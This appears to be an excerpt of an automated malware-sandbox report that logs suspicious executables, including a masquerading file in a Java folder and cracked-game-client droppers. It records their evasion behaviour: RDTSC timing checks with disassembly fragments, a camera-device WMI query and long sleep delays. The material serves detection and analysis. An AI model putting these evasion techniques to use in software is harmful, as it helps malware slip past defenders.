            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeRDTSC instruction interceptor: First address: 8537C0 second address: 85385B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeRDTSC instruction interceptor: First address: 140751F05 second address: 14079ED47 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 jmp 00007F94F0BA31CCh 0x00000008 pop ebx 0x00000009 mov al, 1Fh 0x0000000b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeRDTSC instruction interceptor: First address: 1406DCE2A second address: 1407C8C70 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edx 0x00000004 inc ecx 0x00000005 pop ebp 0x00000006 inc ecx 0x00000007 pop edi 0x00000008 adc edi, 106F2532h 0x0000000e pop edi 0x0000000f sub bp, 7BB8h 0x00000014 dec eax 0x00000015 cmp eax, 68A05505h 0x0000001b pop esi 0x0000001c pop ebp 0x0000001d dec eax 0x0000001e cwde 0x0000001f inc ecx 0x00000020 add ah, FFFFFF92h 0x00000023 inc sp 0x00000025 or ecx, ebp 0x00000027 inc ecx 0x00000028 pop esp 0x00000029 jmp 00007F94F0C3E80Ah 0x0000002e pop ecx 0x0000002f popfd 0x00000030 nop 0x00000031 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSpecial instruction interceptor: First address: 140FC65EC instructions rdtsc caused by: RDTSC with Trap Flag (TF)
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSpecial instruction interceptor: First address: 140FC6604 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
            Source: C:\Browserfont\refdhcp.exeMemory allocated: A70000 memory reserve | memory write watch
            Source: C:\Browserfont\refdhcp.exeMemory allocated: 1A820000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeMemory allocated: CB0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeMemory allocated: 1A720000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeMemory allocated: F40000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeMemory allocated: 1ABF0000 memory reserve | memory write watch
            Source: C:\Browserfont\refdhcp.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 3600000
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599868
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599759
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599646
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599521
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599393
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599280
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599169
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599058
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598946
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598834
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598707
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598592
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598482
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597890
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597752
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597639
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597504
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597386
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597275
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597156
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597053
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596926
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596799
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596687
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596577
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596466
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596354
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596242
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596130
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596003
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595344
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595207
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595094
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594983
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594871
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594755
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594632
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594452
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594315
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594203
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594091
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 593979
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 593867
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Browserfont\refdhcp.exeWindow / User API: threadDelayed 1216
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeWindow / User API: threadDelayed 4614
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeWindow / User API: threadDelayed 5185
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RobloxPlayerLauncher[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RBX-338F2523\RobloxPlayerLauncher.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exe TID: 7708Thread sleep count: 1216 > 30
            Source: C:\Browserfont\refdhcp.exe TID: 7684Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7856Thread sleep count: 366 > 30
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7768Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -39660499758475511s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -3600000s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599868s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599759s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599646s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599521s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599393s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599280s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599169s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -599058s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598946s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598834s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598707s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598592s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -598482s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597890s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597752s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597639s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597504s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597386s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597275s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597156s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597053s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596926s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596799s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596687s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596577s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596466s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596354s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596242s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596130s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596003s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -595344s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -595207s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -595094s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594983s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594871s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594755s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594632s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594452s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594315s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594203s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594091s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -593979s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -593867s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Browserfont\refdhcp.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_00B4A5F4
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_00B5B8E0
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5DD72 VirtualQuery,GetSystemInfo,5_2_00B5DD72
            Source: C:\Browserfont\refdhcp.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 3600000
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599868
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599759
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599646
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599521
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599393
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599280
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599169
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 599058
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598946
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598834
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598707
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598592
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 598482
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597890
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597752
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597639
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597504
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597386
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597275
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597156
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 597053
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596926
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596799
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596687
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596577
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596466
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596354
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596242
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596130
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 596003
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595344
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595207
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 595094
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594983
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594871
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594755
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594632
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594452
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594315
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeThread delayed: delay time: 594203
